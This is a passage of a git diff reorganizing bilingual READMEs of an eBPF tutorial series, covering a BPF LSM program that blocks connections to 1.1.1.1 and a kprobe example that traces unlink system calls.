+``` + +并通过 `ecli` 运行: + +```shell +sudo ecli run package.json +``` + +接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1: + +```console +$ ping 1.1.1.1 +ping: connect: Operation not permitted +$ curl 1.1.1.1 +curl: (7) Couldn't connect to server +$ wget 1.1.1.1 +--2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/ +Connecting to 1.1.1.1:80... failed: Operation not permitted. +Retrying. +``` + +同时,我们可以查看 `bpf_printk` 的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009 + ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009 + curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009 + curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009 + wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 + wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 +``` + +完整源代码: + +## 总结 + +本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 `BPF_PROG` 宏定义函数,并通过 `SEC` 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + ++ ++ diff --git a/src/19-lsm-connect/README_en.md b/src/19-lsm-connect/README_en.md deleted file mode 100644 index 67f89c8..0000000 --- a/src/19-lsm-connect/README_en.md +++ /dev/null @@ -1,170 +0,0 @@ -# eBPF Tutorial by Example 19: Security Detection and Defense using LSM - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program. - -## Background - -LSM has been an official security framework in the Linux kernel since Linux 2.6, and security implementations based on it include SELinux and AppArmor. With the introduction of BPF LSM in Linux 5.7, system developers have been able to freely implement function-level security checks. This article provides an example of limiting access to a specific IPv4 address through the socket connect function using a BPF LSM program. (This demonstrates its high control precision.) - -## Overview of LSM - -LSM (Linux Security Modules) is a framework in the Linux kernel that supports various computer security models. LSM predefines a set of hook points on critical paths related to Linux kernel security, decoupling the kernel from security modules. This allows different security modules to be loaded/unloaded in the kernel freely without modifying the existing kernel code, thus enabling them to provide security inspection features. - -In the past, using LSM mainly involved configuring existing security modules like SELinux and AppArmor or writing custom kernel modules. However, with the introduction of the BPF LSM mechanism in Linux 5.7, everything changed. Now, developers can write custom security policies using eBPF and dynamically load them into the LSM mount points in the kernel without configuring or writing kernel modules. 
- -Some of the hook points currently supported by LSM include: - -+ File open, creation, deletion, and movement; -+ Filesystem mounting; -+ Operations on tasks and processes; -+ Operations on sockets (creating, binding sockets, sending and receiving messages, etc.); - -For more hook points, refer to [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h). - -## Verifying BPF LSM Availability - -First, please confirm that your kernel version is higher than 5.7. Next, you can use the following command to check if BPF LSM support is enabled: - -```console -$ cat /boot/config-$(uname -r) | grep BPF_LSM -CONFIG_BPF_LSM=y -``` - -If the output contains `CONFIG_BPF_LSM=y`, BPF LSM is supported. Provided that the above conditions are met, you can use the following command to check if the output includes the `bpf` option: - -```console -$ cat /sys/kernel/security/lsm -ndlock,lockdown,yama,integrity,apparmor -``` - -If the output does not include the `bpf` option (as in the example above), you can modify `/etc/default/grub`: - -```conf -GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf" -``` - -Then, update the grub configuration using the `update-grub2` command (the corresponding command may vary depending on the system), and restart the system. - -## Writing eBPF Programs - -```C -// lsm-connect.bpf.c -#include "vmlinux.h" -#include -#include -#include - -char LICENSE[] SEC("license") = "GPL"; - -#define EPERM 1 -#define AF_INET 2 - -const __u32 blockme = 16843009; // 1.1.1.1 -> int - -SEC("lsm/socket_connect") -int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret) -{ - // Satisfying "cannot override a denial" rule - if (ret != 0) - { - return ret; - } - - // Only IPv4 in this example - if (address->sa_family != AF_INET) - { - return 0; - } - - // Cast the address to an IPv4 socket address - struct sockaddr_in *addr = (struct sockaddr_in *)address; - - // Where do you want to go? - __u32 dest = addr->sin_addr.s_addr; - bpf_printk("lsm: found connect to %d", dest); - - if (dest == blockme) - { - bpf_printk("lsm: blocking %d", dest); - return -EPERM; - } - return 0; -} -``` - -This is eBPF code implemented in C on the kernel side. It blocks all connection operations through a socket to 1.1.1.1. The following information is included: - -+ The `SEC("lsm/socket_connect")` macro indicates the expected mount point for this program. -+ The program is defined by the `BPF_PROG` macro (see [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h) for details). -+ `restrict_connect` is the program name required by the `BPF_PROG` macro. -+ `ret` is the return value of the LSM check program (potential) before the current function on this mount point. - -The overall idea of the program is not difficult to understand: - -+ First, if the return value of other security check functions is non-zero (failed), there is no need to check further and the connection is rejected. -+ Next, it determines whether it is an IPv4 connection request and compares the address being connected to with 1.1.1.1. -+ If the requested address is 1.1.1.1, the connection is blocked; otherwise, the connection is allowed. - -During the execution of the program, all connection operations through a socket will be output to `/sys/kernel/debug/tracing/trace_pipe`. 
- -## Compilation and Execution - -Compile using a container: - -```console -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or compile using `ecc`: - -```console -$ ecc lsm-connect.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -And run using `ecli`: - -```shell -sudo ecli run package.json -``` - -Next, open another terminal and try to access 1.1.1.1: - -```console -$ ping 1.1.1.1 -ping: connect: Operation not permitted -$ curl 1.1.1.1 -curl: (7) Couldn't connect to server -$ wget 1.1.1.1 ---2023-04-23 08:41:18-- (try: 2) http://1.1.1.1/ -Connecting to 1.1.1.1:80... failed: Operation not permitted. -Retrying. -``` - -At the same time, we can view the output of `bpf_printk`: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009 - ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009 - curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009 - curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009".``` -wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 -wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009 -``` - -Complete source code: - -## Summary - -This article introduces how to use BPF LSM to restrict access to a specific IPv4 address through a socket. We can enable the LSM BPF mount point by modifying the GRUB configuration file. In the eBPF program, we define functions using the `BPF_PROG` macro and specify the mount point using the `SEC` macro. In the implementation of the function, we follow the principle of "cannot override a denial" in the LSM security-checking module and restrict the socket connection request based on the destination address of the request. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. - -## References - -+ -+ - -> The original link of this article: diff --git a/src/2-kprobe-unlink/README.md b/src/2-kprobe-unlink/README.md index ca835b0..139aa5c 100644 --- a/src/2-kprobe-unlink/README.md +++ b/src/2-kprobe-unlink/README.md @@ -1,35 +1,36 @@ -# eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 +# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。 +This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. 
-## kprobes 技术背景 +## Background of kprobes Technology -开发人员在内核或者模块的调试过程中,往往会需要要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。 +During the debugging process of the kernel or modules, developers often need to know whether certain functions are called, when they are called, whether the execution is correct, and what the input and return values of the functions are. A simple approach is to add log print information to the corresponding functions in the kernel code. However, this approach often requires recompiling the kernel or modules, restarting the device, etc., which is complex and may disrupt the original code execution process. -而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。 +By using the kprobes technology, users can define their own callback functions and dynamically insert probes into almost all functions in the kernel or modules (some functions cannot be probed, such as the kprobes' own implementation functions, which will be explained in detail later). When the kernel execution flow reaches the specified probe function, it will invoke the callback function, allowing the user to collect the desired information. The kernel will then return to the normal execution flow. If the user has collected sufficient information and no longer needs to continue probing, the probes can be dynamically removed. Therefore, the kprobes technology has the advantages of minimal impact on the kernel execution flow and easy operation. -kprobes 技术包括的3种探测手段分别时 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 `pre_handler`、`post_handler` 和 `fault_handler`,其中 `pre_handler` 函数将在被探测指令被执行前回调,`post_handler` 会在被探测指令执行完毕后回调(注意不是被探测函数),`fault_handler` 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。 +The kprobes technology includes three detection methods: kprobe, jprobe, and kretprobe. First, kprobe is the most basic detection method and serves as the basis for the other two. It allows probes to be placed at any position (including within a function). It provides three callback modes for probes: `pre_handler`, `post_handler`, and `fault_handler`. The `pre_handler` function is called before the probed instruction is executed, the `post_handler` is called after the probed instruction is completed (note that it is not the probed function), and the `fault_handler` is called when a memory access error occurs. The jprobe is based on kprobe and is used to obtain the input values of the probed function. Finally, as the name suggests, kretprobe is also based on kprobe and is used to obtain the return values of the probed function. -kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。 +The kprobes technology is not only implemented through software but also requires support from the hardware architecture. This involves CPU exception handling and single-step debugging techniques. 
The former is used to make the program's execution flow enter the user-registered callback function, and the latter is used to single-step execute the probed instruction. Therefore, not all architectures support kprobes. Currently, kprobes technology supports various architectures, including i386, x86_64, ppc64, ia64, sparc64, arm, ppc, and mips (note that some architecture implementations may not be complete, see the kernel's Documentation/kprobes.txt for details).

-kprobes 的特点与使用限制:
+Features and Usage Restrictions of kprobes:

-1. kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 `post_handler` 回调函数作为被探测点。
-2. 一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有`do_page_fault` 和 `notifier_call_chain`;
-3. 如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果;
-4. 一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存与`struct pt_regs`结构体中的触发探测器之前寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码;
-5. kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在`printk()`函数上注册了探测点,而在它的回调函数中可能会再次调用`printk`函数,此时将不再触发`printk`探测点的回调,仅仅是增加了`kprobe`结构体中`nmissed`字段的数值;
-6. 在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存;
-7. kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等);
-8. kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数`__builtin_return_address()`调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址;
-9. 如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如`do_exit()`函数会存在问题,而`do_execve()`函数和`do_fork()`函数不会;
-10. 当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为`__switch_to()`函数注册 kretprobe,将直接返回`-EINVAL`。
+1. kprobes allows multiple kprobes to be registered at the same probe position, but jprobe currently does not support this. It is also not allowed to use other jprobe callback functions or the `post_handler` callback function of kprobe as probe points.
+2. In general, any function in the kernel can be probed, including interrupt handlers. However, the functions used to implement kprobes themselves in kernel/kprobes.c and arch/*/kernel/kprobes.c are not allowed to be probed. Additionally, `do_page_fault` and `notifier_call_chain` are also not allowed.
+3. If an inline function is used as a probe point, kprobes may not be able to guarantee that probe points are registered for all instances of that function. Since gcc may automatically optimize certain functions as inline functions, the desired probing effect may not be achieved.
+4. The callback function of a probe point may modify the runtime context of the probed function, for example by modifying kernel data structures or by altering the pre-probe register state saved in the `struct pt_regs` structure. Therefore, kprobes can be used to install bug fixes or inject fault testing code.
+5. kprobes avoids recursively invoking probe callbacks: for example, if a probe point is registered on the `printk()` function and its callback calls `printk()` again, the callback for the `printk` probe point will not be triggered a second time; only the `nmissed` field in the `kprobe` structure will be incremented.
+6. mutex locks and dynamic memory allocation are not used in the registration and removal process of kprobes.
-
-## kprobe 示例
+7.
During the execution of kprobes callback functions, kernel preemption is disabled, and it may also be executed with interrupts disabled, which depends on the CPU architecture. Therefore, regardless of the situation, do not call functions that will give up the CPU in the callback function (such as semaphore, mutex lock, etc.); +8. kretprobe is implemented by replacing the return address with the pre-defined trampoline address, so stack backtraces and gcc inline function `__builtin_return_address()` will return the address of the trampoline instead of the actual return address of the probed function; +9. If the number of function calls and return calls of a function are unequal, registering kretprobe on such a function may not achieve the expected effect, for example, the `do_exit()` function will have problems, while the `do_execve()` function and `do_fork()` function will not; +10. When entering and exiting a function, if the CPU is running on a stack that does not belong to the current task, registering kretprobe on that function may have unpredictable consequences. Therefore, kprobes does not support registering kretprobe for the `__switch_to()` function under the X86_64 architecture and will directly return `-EINVAL`. -完整代码如下: +## kprobe Example + +The complete code is as follows: ```c #include "vmlinux.h" @@ -62,9 +63,9 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) } ``` -这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在`do_unlinkat`函数的入口和退出处放置钩子,实现对该系统调用的跟踪。 +This code is a simple eBPF program used to monitor and capture the unlink system call executed in the Linux kernel. The unlink system call is used to delete a file. This eBPF program traces this system call by placing hooks at the entry and exit points of the `do_unlinkat` function using a kprobe (kernel probe). -首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。 +First, we import necessary header files such as vmlinux.h, bpf_helpers.h, bpf_tracing.h, and bpf_core_read.h. Then, we define a license to allow the program to run in the kernel. ```c #include "vmlinux.h" @@ -75,7 +76,7 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -接下来,我们定义一个名为`BPF_KPROBE(do_unlinkat)`的 kprobe,当进入`do_unlinkat`函数时,它会被触发。该函数接受两个参数:`dfd`(文件描述符)和`name`(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用`bpf_printk`函数在内核日志中打印 PID 和文件名。 +Next, we define a kprobe named `BPF_KPROBE(do_unlinkat)` which gets triggered when the `do_unlinkat` function is entered. It takes two parameters: `dfd` (file descriptor) and `name` (filename structure pointer). In this kprobe, we retrieve the PID (process identifier) of the current process and then read the filename. Finally, we use the `bpf_printk` function to print the PID and filename in the kernel log. ```c SEC("kprobe/do_unlinkat") @@ -91,7 +92,7 @@ int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) } ``` -接下来,我们定义一个名为`BPF_KRETPROBE(do_unlinkat_exit)`的 kretprobe,当从`do_unlinkat`函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用`bpf_printk`函数在内核日志中打印 PID 和返回值。 +Next, we define a kretprobe named `BPF_KRETPROBE(do_unlinkat_exit)` that will be triggered when exiting the `do_unlinkat` function. The purpose of this kretprobe is to capture the return value (`ret`) of the function. We again obtain the PID of the current process and use the `bpf_printk` function to print the PID and return value in the kernel log. 
```c SEC("kretprobe/do_unlinkat") @@ -105,9 +106,9 @@ int BPF_KRETPROBE(do_unlinkat_exit, long ret) } ``` -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its goal is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. -要编译这个程序,请使用 ecc 工具: +To compile this program, use the ecc tool: ```console $ ecc kprobe-link.bpf.c @@ -115,13 +116,13 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -然后运行: +Then run: ```console sudo ecli run package.json ``` -在另外一个窗口中: +In another window: ```shell touch test1 @@ -130,7 +131,7 @@ touch test2 rm test2 ``` -在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出: +You should see kprobe demo output similar to the following in the /sys/kernel/debug/tracing/trace_pipe file: ```shell $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -140,10 +141,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0 ``` -## 总结 +## Summary -通过本文的示例,我们学习了如何使用 eBPF 的 kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: +In this article's example, we learned how to use eBPF's kprobe and kretprobe to capture the unlink system call. For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: -本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 +This article is the second part of the introductory eBPF development tutorial. The next article will explain how to use fentry to monitor and capture the unlink system call in eBPF. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. 
diff --git a/src/2-kprobe-unlink/README.zh.md b/src/2-kprobe-unlink/README.zh.md new file mode 100644 index 0000000..ca835b0 --- /dev/null +++ b/src/2-kprobe-unlink/README.zh.md @@ -0,0 +1,149 @@ +# eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第二篇,在 eBPF 中使用 kprobe 捕获 unlink 系统调用。本文会先讲解关于 kprobes 的基本概念和技术背景,然后介绍如何在 eBPF 中使用 kprobe 捕获 unlink 系统调用。 + +## kprobes 技术背景 + +开发人员在内核或者模块的调试过程中,往往会需要要知道其中的一些函数有无被调用、何时被调用、执行是否正确以及函数的入参和返回值是什么等等。比较简单的做法是在内核代码对应的函数中添加日志打印信息,但这种方式往往需要重新编译内核或模块,重新启动设备之类的,操作较为复杂甚至可能会破坏原有的代码执行过程。 + +而利用 kprobes 技术,用户可以定义自己的回调函数,然后在内核或者模块中几乎所有的函数中(有些函数是不可探测的,例如kprobes自身的相关实现函数,后文会有详细说明)动态地插入探测点,当内核执行流程执行到指定的探测函数时,会调用该回调函数,用户即可收集所需的信息了,同时内核最后还会回到原本的正常执行流程。如果用户已经收集足够的信息,不再需要继续探测,则同样可以动态地移除探测点。因此 kprobes 技术具有对内核执行流程影响小和操作方便的优点。 + +kprobes 技术包括的3种探测手段分别时 kprobe、jprobe 和 kretprobe。首先 kprobe 是最基本的探测方式,是实现后两种的基础,它可以在任意的位置放置探测点(就连函数内部的某条指令处也可以),它提供了探测点的调用前、调用后和内存访问出错3种回调方式,分别是 `pre_handler`、`post_handler` 和 `fault_handler`,其中 `pre_handler` 函数将在被探测指令被执行前回调,`post_handler` 会在被探测指令执行完毕后回调(注意不是被探测函数),`fault_handler` 会在内存访问出错时被调用;jprobe 基于 kprobe 实现,它用于获取被探测函数的入参值;最后 kretprobe 从名字中就可以看出其用途了,它同样基于 kprobe 实现,用于获取被探测函数的返回值。 + +kprobes 的技术原理并不仅仅包含纯软件的实现方案,它也需要硬件架构提供支持。其中涉及硬件架构相关的是 CPU 的异常处理和单步调试技术,前者用于让程序的执行流程陷入到用户注册的回调函数中去,而后者则用于单步执行被探测点指令,因此并不是所有的架构均支持 kprobes。目前 kprobes 技术已经支持多种架构,包括 i386、x86_64、ppc64、ia64、sparc64、arm、ppc 和 mips(有些架构实现可能并不完全,具体可参考内核的 Documentation/kprobes.txt)。 + +kprobes 的特点与使用限制: + +1. kprobes 允许在同一个被探测位置注册多个 kprobe,但是目前 jprobe 却不可以;同时也不允许以其他的 jprobe 回调函数和 kprobe 的 `post_handler` 回调函数作为被探测点。 +2. 一般情况下,可以探测内核中的任何函数,包括中断处理函数。不过在 kernel/kprobes.c 和 arch/*/kernel/kprobes.c 程序中用于实现 kprobes 自身的函数是不允许被探测的,另外还有`do_page_fault` 和 `notifier_call_chain`; +3. 如果以一个内联函数为探测点,则 kprobes 可能无法保证对该函数的所有实例都注册探测点。由于 gcc 可能会自动将某些函数优化为内联函数,因此可能无法达到用户预期的探测效果; +4. 一个探测点的回调函数可能会修改被探测函数的运行上下文,例如通过修改内核的数据结构或者保存与`struct pt_regs`结构体中的触发探测器之前寄存器信息。因此 kprobes 可以被用来安装 bug 修复代码或者注入故障测试代码; +5. kprobes 会避免在处理探测点函数时再次调用另一个探测点的回调函数,例如在`printk()`函数上注册了探测点,而在它的回调函数中可能会再次调用`printk`函数,此时将不再触发`printk`探测点的回调,仅仅是增加了`kprobe`结构体中`nmissed`字段的数值; +6. 在 kprobes 的注册和注销过程中不会使用 mutex 锁和动态的申请内存; +7. kprobes 回调函数的运行期间是关闭内核抢占的,同时也可能在关闭中断的情况下执行,具体要视CPU架构而定。因此不论在何种情况下,在回调函数中不要调用会放弃 CPU 的函数(如信号量、mutex 锁等); +8. kretprobe 通过替换返回地址为预定义的 trampoline 的地址来实现,因此栈回溯和 gcc 内嵌函数`__builtin_return_address()`调用将返回 trampoline 的地址而不是真正的被探测函数的返回地址; +9. 如果一个函数的调用次数和返回次数不相等,则在类似这样的函数上注册 kretprobe 将可能不会达到预期的效果,例如`do_exit()`函数会存在问题,而`do_execve()`函数和`do_fork()`函数不会; +10. 
当在进入和退出一个函数时,如果 CPU 运行在非当前任务所有的栈上,那么往该函数上注册 kretprobe 可能会导致不可预料的后果,因此,kprobes 不支持在 X86_64 的结构下为`__switch_to()`函数注册 kretprobe,将直接返回`-EINVAL`。 + +## kprobe 示例 + +完整代码如下: + +```c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("kprobe/do_unlinkat") +int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + const char *filename; + + pid = bpf_get_current_pid_tgid() >> 32; + filename = BPF_CORE_READ(name, name); + bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); + return 0; +} + +SEC("kretprobe/do_unlinkat") +int BPF_KRETPROBE(do_unlinkat_exit, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); + return 0; +} +``` + +这段代码是一个简单的 eBPF 程序,用于监测和捕获在 Linux 内核中执行的 unlink 系统调用。unlink 系统调用的功能是删除一个文件,这个 eBPF 程序通过使用 kprobe(内核探针)在`do_unlinkat`函数的入口和退出处放置钩子,实现对该系统调用的跟踪。 + +首先,我们导入必要的头文件,如 vmlinux.h,bpf_helpers.h,bpf_tracing.h 和 bpf_core_read.h。接着,我们定义许可证,以允许程序在内核中运行。 + +```c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +接下来,我们定义一个名为`BPF_KPROBE(do_unlinkat)`的 kprobe,当进入`do_unlinkat`函数时,它会被触发。该函数接受两个参数:`dfd`(文件描述符)和`name`(文件名结构体指针)。在这个 kprobe 中,我们获取当前进程的 PID(进程标识符),然后读取文件名。最后,我们使用`bpf_printk`函数在内核日志中打印 PID 和文件名。 + +```c +SEC("kprobe/do_unlinkat") +int BPF_KPROBE(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + const char *filename; + + pid = bpf_get_current_pid_tgid() >> 32; + filename = BPF_CORE_READ(name, name); + bpf_printk("KPROBE ENTRY pid = %d, filename = %s\n", pid, filename); + return 0; +} +``` + +接下来,我们定义一个名为`BPF_KRETPROBE(do_unlinkat_exit)`的 kretprobe,当从`do_unlinkat`函数退出时,它会被触发。这个 kretprobe 的目的是捕获函数的返回值(ret)。我们再次获取当前进程的 PID,并使用`bpf_printk`函数在内核日志中打印 PID 和返回值。 + +```c +SEC("kretprobe/do_unlinkat") +int BPF_KRETPROBE(do_unlinkat_exit, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("KPROBE EXIT: pid = %d, ret = %ld\n", pid, ret); + return 0; +} +``` + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。 + +要编译这个程序,请使用 ecc 工具: + +```console +$ ecc kprobe-link.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +然后运行: + +```console +sudo ecli run package.json +``` + +在另外一个窗口中: + +```shell +touch test1 +rm test1 +touch test2 +rm test2 +``` + +在 /sys/kernel/debug/tracing/trace_pipe 文件中,应该能看到类似下面的 kprobe 演示输出: + +```shell +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + rm-9346 [005] d..3 4710.951696: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test1 + rm-9346 [005] d..4 4710.951819: bpf_trace_printk: KPROBE EXIT: ret = 0 + rm-9346 [005] d..3 4710.951852: bpf_trace_printk: KPROBE ENTRY pid = 9346, filename = test2 + rm-9346 [005] d..4 4710.951895: bpf_trace_printk: KPROBE EXIT: ret = 0 +``` + +## 总结 + +通过本文的示例,我们学习了如何使用 eBPF 的 kprobe 和 kretprobe 捕获 unlink 系统调用。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +本文是 eBPF 入门开发实践教程的第二篇。下一篇文章将介绍如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/2-kprobe-unlink/README_en.md b/src/2-kprobe-unlink/README_en.md deleted file mode 100644 index 139aa5c..0000000 --- a/src/2-kprobe-unlink/README_en.md +++ /dev/null @@ -1,150 +0,0 @@ -# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. 
